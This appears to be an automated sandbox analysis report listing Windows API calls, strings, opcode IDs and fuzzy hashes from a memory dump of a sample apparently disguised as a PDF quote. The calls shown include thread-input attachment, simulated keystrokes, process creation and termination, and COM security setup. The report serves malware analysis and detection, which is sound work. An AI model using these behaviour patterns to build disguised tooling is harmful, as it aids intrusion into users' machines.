                                                                    • Instruction Fuzzy Hash: 7AB1BD7190420A9FDB00DFA4C984FBEBBF4EF49325F205029E595BB291D736A946CF90
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00EC1521
                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00EC0599,?,00000001), ref: 00EC1535
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00EC153C
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EC0599,?,00000001), ref: 00EC154B
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EC155D
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EC0599,?,00000001), ref: 00EC1576
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EC0599,?,00000001), ref: 00EC1588
                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00EC0599,?,00000001), ref: 00EC15CD
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00EC0599,?,00000001), ref: 00EC15E2
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00EC0599,?,00000001), ref: 00EC15ED
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                    • String ID:
                                                                    • API String ID: 2156557900-0
                                                                    • Opcode ID: baaf43c6c509ad4da9b701298d02d515461f85635dad02a26c717f4d55ed871f
                                                                    • Instruction ID: e09b118ebd0e0bb2b04b8431cf79d5242d1ecc50cfec948b9dd56dcd99cf8219
                                                                    • Opcode Fuzzy Hash: baaf43c6c509ad4da9b701298d02d515461f85635dad02a26c717f4d55ed871f
                                                                    • Instruction Fuzzy Hash: 603106B190020CFFDF209F51EE84FA937AAEF85315F10409AF801EA1A1E776DD428B60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$_memset
                                                                    • String ID: ,,$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                    • API String ID: 2862541840-218231672
                                                                    • Opcode ID: a93b0f9f1ac8e1aab9b60a3c4e16d9bc5939ad768f06d5fae4ef1e32169755b9
                                                                    • Instruction ID: b2df40f2f65149680f7d28b908f10d75a4c3c2ef34811df1b3ae2acedbbdc7aa
                                                                    • Opcode Fuzzy Hash: a93b0f9f1ac8e1aab9b60a3c4e16d9bc5939ad768f06d5fae4ef1e32169755b9
                                                                    • Instruction Fuzzy Hash: E091A170A00219ABCF24CFA5CC84FAEB7B8EF45714F10915AF519BB282C7709946CBA0
                                                                    APIs
                                                                    • EnumChildWindows.USER32(?,00EBA844), ref: 00EBA782
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ChildEnumWindows
                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                    • API String ID: 3555792229-1603158881
                                                                    • Opcode ID: d7caeab36f1393aec872ae5925da805297355a1c4afa5c1dacaa33d267ef73c2
                                                                    • Instruction ID: 2fe7403611f3defaf048cf60a95273a7a3066c4c77612bd1ac7361283d72bda9
                                                                    • Opcode Fuzzy Hash: d7caeab36f1393aec872ae5925da805297355a1c4afa5c1dacaa33d267ef73c2
                                                                    • Instruction Fuzzy Hash: 9D91E370A04605ABCF18EF60C492BEEFBB4BF04304F58A12AD89DB7151DF316999DB91
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00E62EAE
                                                                      • Part of subcall function 00E61DB3: GetClientRect.USER32(?,?), ref: 00E61DDC
                                                                      • Part of subcall function 00E61DB3: GetWindowRect.USER32(?,?), ref: 00E61E1D
                                                                      • Part of subcall function 00E61DB3: ScreenToClient.USER32(?,?), ref: 00E61E45
                                                                    • GetDC.USER32 ref: 00E9CEB2
                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E9CEC5
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00E9CED3
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00E9CEE8
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00E9CEF0
                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E9CF7B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                    • String ID: U
                                                                    • API String ID: 4009187628-3372436214
                                                                    • Opcode ID: f0f8a3c2978b2ccecceb50976cc4079650e904966b070bb77ecbb03de568b432
                                                                    • Instruction ID: d8693829eeabd294ebeb659ab79f3b54e694b0802a1f1f9ef238dc189713d390
                                                                    • Opcode Fuzzy Hash: f0f8a3c2978b2ccecceb50976cc4079650e904966b070bb77ecbb03de568b432
                                                                    • Instruction Fuzzy Hash: D2719331500209DFCF229F64D884AFA7BB6FF48354F24626AFE557A266C7319841DF60
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00EEF910), ref: 00ED8E3D
                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00EEF910), ref: 00ED8E71
                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00ED8FEB
                                                                    • SysFreeString.OLEAUT32(?), ref: 00ED9015
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                    • String ID:
                                                                    • API String ID: 560350794-0
                                                                    • Opcode ID: 6043103afb032a0b4b2715c1f309582d693489dba46b1206ceedeafa212e07e0
                                                                    • Instruction ID: f7847df7f157f65df512d38aeebb537ab34b8e27330c70ff43250c4c570dc329
                                                                    • Opcode Fuzzy Hash: 6043103afb032a0b4b2715c1f309582d693489dba46b1206ceedeafa212e07e0
                                                                    • Instruction Fuzzy Hash: 38F12871A00209EFCB04DF94C988EAEB7B9FF49315F109499F915BB291DB31AE46CB50
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00EDF7C9
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EDF95C
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EDF980
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EDF9C0
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EDF9E2
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EDFB5E
                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00EDFB90
                                                                    • CloseHandle.KERNEL32(?), ref: 00EDFBBF
                                                                    • CloseHandle.KERNEL32(?), ref: 00EDFC36
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                    • String ID:
                                                                    • API String ID: 4090791747-0
                                                                    • Opcode ID: 2c52ddcd528be006d88a791eadb28bdf2a609cef4c8e9909310c37d95c34f8c1
                                                                    • Instruction ID: 2a50e619dcc631ac6da34cb4906172d1c83eaf9aebb125738c72af52a0ca245c
                                                                    • Opcode Fuzzy Hash: 2c52ddcd528be006d88a791eadb28bdf2a609cef4c8e9909310c37d95c34f8c1
                                                                    • Instruction Fuzzy Hash: A8E1B4316043409FCB14EF24D491B6ABBE5EF84354F18946EF89AAB3A2CB31DC45CB52
                                                                    APIs
                                                                      • Part of subcall function 00EC46AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EC36DB,?), ref: 00EC46CC
                                                                      • Part of subcall function 00EC46AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EC36DB,?), ref: 00EC46E5
                                                                      • Part of subcall function 00EC4AD8: GetFileAttributesW.KERNEL32(?,00EC374F), ref: 00EC4AD9
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00EC4DE7
                                                                    • _wcscmp.LIBCMT ref: 00EC4E01
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00EC4E1C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 793581249-0
                                                                    • Opcode ID: 2ddbf3b3b342b9abf531c9886a0fd5188fc5e3ce30793977db3d08d13d60bf42
                                                                    • Instruction ID: aa4da87dd4294d66240877f73cc32567c01c557dde5e4dc37f362e0a528d0647
                                                                    • Opcode Fuzzy Hash: 2ddbf3b3b342b9abf531c9886a0fd5188fc5e3ce30793977db3d08d13d60bf42
                                                                    • Instruction Fuzzy Hash: BB5177B21083845BC724EB90D991EDF77ECAF84340F00192EF689E7191EF35A5898756
                                                                    APIs
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EE8731
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 634782764-0
                                                                    • Opcode ID: 8444ba32ae9cd494bbe3e912858f46ae10bab3cb37b37588709dde82a757f354
                                                                    • Instruction ID: da06683ac8b31f9e315212db2fc4c1dbff2f04088ae941dd4b6babe8f4fceeaf
                                                                    • Opcode Fuzzy Hash: 8444ba32ae9cd494bbe3e912858f46ae10bab3cb37b37588709dde82a757f354
                                                                    • Instruction Fuzzy Hash: 2151E77050028DBFEF249F67DD85B993BA4EB05314FA05516FA18FA1E0CF71A980DB85
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E9C477
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E9C499
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E9C4B1
                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E9C4CF
                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E9C4F0
                                                                    • DestroyIcon.USER32(00000000), ref: 00E9C4FF
                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E9C51C
                                                                    • DestroyIcon.USER32(?), ref: 00E9C52B
                                                                      • Part of subcall function 00EEA4E1: DeleteObject.GDI32(00000000), ref: 00EEA51A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                    • String ID:
                                                                    • API String ID: 2819616528-0
                                                                    • Opcode ID: 17e30144d59ef0b3ffaa1b3fc03ab3cfcd162ad8d547581f01310a509cbdb8b7
                                                                    • Instruction ID: 9584d28ed12c49a988bb41c65b178dd30298caf18088d09a1da2b1252998ca24
                                                                    • Opcode Fuzzy Hash: 17e30144d59ef0b3ffaa1b3fc03ab3cfcd162ad8d547581f01310a509cbdb8b7
                                                                    • Instruction Fuzzy Hash: 59517970640609AFDF20DF24EC85FAA77E5EB58754F20552CFA12AB2A0D770AD81DB50
                                                                    APIs
                                                                      • Part of subcall function 00EBAC37: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EBAC57
                                                                      • Part of subcall function 00EBAC37: GetCurrentThreadId.KERNEL32 ref: 00EBAC5E
                                                                      • Part of subcall function 00EBAC37: AttachThreadInput.USER32(00000000,?,00EB9945,?,00000001), ref: 00EBAC65
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EB9950
                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00EB996D
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00EB9970
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EB9979
                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00EB9997
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00EB999A
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EB99A3
                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00EB99BA
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00EB99BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                    • String ID:
                                                                    • API String ID: 2014098862-0
                                                                    • Opcode ID: f972801255848d496015df8a24e953503533077f43a6451516f62dee3f67b51f
                                                                    • Instruction ID: db72b9b89f41f9020a46c4118dea42aa4b41fe1b0fc1bdaf9428070a410f90e4
                                                                    • Opcode Fuzzy Hash: f972801255848d496015df8a24e953503533077f43a6451516f62dee3f67b51f
                                                                    • Instruction Fuzzy Hash: C711CE7195025CBFFA106B61CC89FAA7F6DEB8D751F200429F244BB0E1C9F25C109AA4
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00EB8864,00000B00,?,?), ref: 00EB8BEC
                                                                    • HeapAlloc.KERNEL32(00000000,?,00EB8864,00000B00,?,?), ref: 00EB8BF3
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EB8864,00000B00,?,?), ref: 00EB8C08
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00EB8864,00000B00,?,?), ref: 00EB8C10
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00EB8864,00000B00,?,?), ref: 00EB8C13
                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00EB8864,00000B00,?,?), ref: 00EB8C23
                                                                    • GetCurrentProcess.KERNEL32(00EB8864,00000000,?,00EB8864,00000B00,?,?), ref: 00EB8C2B
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00EB8864,00000B00,?,?), ref: 00EB8C2E
                                                                    • CreateThread.KERNEL32(00000000,00000000,00EB8C54,00000000,00000000,00000000), ref: 00EB8C48
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                    • String ID:
                                                                    • API String ID: 1957940570-0
                                                                    • Opcode ID: 1adafa6699a1f7cca50091c33f6fa794b54ab7c6ad98e9920ba496b7e328d36c
                                                                    • Instruction ID: 959a1d037ab013187eff2ca7fff38573743bcf2fe986f4c05d6a4f900742b28a
                                                                    • Opcode Fuzzy Hash: 1adafa6699a1f7cca50091c33f6fa794b54ab7c6ad98e9920ba496b7e328d36c
                                                                    • Instruction Fuzzy Hash: 1E01ACB564134CFFE610AB65DC89F577B6CEB89711F018421FA05EF1A2CA70D804CA20
                                                                    APIs
                                                                      • Part of subcall function 00EB7432: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EB736C,80070057,?,?,?,00EB777D), ref: 00EB744F
                                                                      • Part of subcall function 00EB7432: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EB736C,80070057,?,?), ref: 00EB746A
                                                                      • Part of subcall function 00EB7432: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EB736C,80070057,?,?), ref: 00EB7478
                                                                      • Part of subcall function 00EB7432: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EB736C,80070057,?), ref: 00EB7488
                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00ED991B
                                                                    • _memset.LIBCMT ref: 00ED9928
                                                                    • _memset.LIBCMT ref: 00ED9A6B
                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00ED9A97
                                                                    • CoTaskMemFree.OLE32(?), ref: 00ED9AA2
                                                                    Strings
                                                                    • NULL Pointer assignment, xrefs: 00ED9AF0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                    • String ID: NULL Pointer assignment
                                                                    • API String ID: 1300414916-2785691316
                                                                    • Opcode ID: d32c49f0f100a386e856ef218ba1410581d52fb9259363edca99922f6ca91038
                                                                    • Instruction ID: d04611cbfbcb1b705105c231761afff36c0ed2d738db3a33e068e228f61e76f9
                                                                    • Opcode Fuzzy Hash: d32c49f0f100a386e856ef218ba1410581d52fb9259363edca99922f6ca91038
                                                                    • Instruction Fuzzy Hash: 0F912771D00229ABDB10DFA5DC81EDEBBB8EF08750F10516AF519B7281DB71AA45CFA0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EE6E56
                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00EE6E6A
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EE6E84
                                                                    • _wcscat.LIBCMT ref: 00EE6EDF
                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00EE6EF6
                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EE6F24
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window_wcscat
                                                                    • String ID: SysListView32
                                                                    • API String ID: 307300125-78025650
                                                                    • Opcode ID: 6eb88bebf8725d389fb59af9b74f9e6f41c28b67b5fa0981662cee1f07869c65
                                                                    • Instruction ID: 988a6dd72a92aa6ade5a12a7647c3b065a530bb3f97f185f60db38612baf63d6
                                                                    • Opcode Fuzzy Hash: 6eb88bebf8725d389fb59af9b74f9e6f41c28b67b5fa0981662cee1f07869c65
                                                                    • Instruction Fuzzy Hash: 29419F70A0038CAFDB219F65CC85BEA77E8EB18394F10146AF544B72A1D3729D84CB50
                                                                    APIs
                                                                      • Part of subcall function 00EC3C99: CreateToolhelp32Snapshot.KERNEL32 ref: 00EC3CBE
                                                                      • Part of subcall function 00EC3C99: Process32FirstW.KERNEL32(00000000,?), ref: 00EC3CCC
                                                                      • Part of subcall function 00EC3C99: CloseHandle.KERNEL32(00000000), ref: 00EC3D96
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EDEAB8
                                                                    • GetLastError.KERNEL32 ref: 00EDEACB
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EDEAFA
                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EDEB77
                                                                    • GetLastError.KERNEL32(00000000), ref: 00EDEB82
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00EDEBB7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
